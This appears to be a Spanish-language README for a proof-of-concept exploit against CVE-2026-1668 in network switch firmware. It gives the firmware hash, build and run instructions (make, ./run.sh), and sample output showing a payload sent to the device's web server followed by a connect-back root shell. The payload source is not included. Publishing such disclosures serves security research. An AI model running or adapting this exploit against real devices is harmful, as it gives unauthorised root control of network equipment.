
Exploit de prueba de concepto para CVE-2026-1668.
Este es un exploit de prueba de concepto para CVE-2026-1668. Está destinado únicamente a fines educativos. No intente explotar sistemas que no le pertenezcan o para los que no tenga permiso explícito.
Este exploit de prueba de concepto se desarrolló contra una imagen de firmware con el siguiente hash SHA256: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544.
Nombres de firmwares conocidos que coinciden con ese hash (no exhaustivo):
Es probable que las versiones anteriores de firmware también sean vulnerables, pero pueden requerir cambios menores en el payload del exploit.
Se puede encontrar una explicación de cómo funciona el payload en esta entrada de blog.
Se requiere una cadena de herramientas GCC MIPS Linux para compilar el payload. En Ubuntu 24.04, se puede instalar con sudo apt install gcc-mips-linux-gnu.
$ make
Este exploit debe ejecutarse antes de que el servidor HTTP haya atendido su primera solicitud (es decir, en un arranque recién hecho).
$ ./run.sh
El script debería proporcionarte una shell de root. Si no es así, el exploit ha fallado.
[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json
{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc #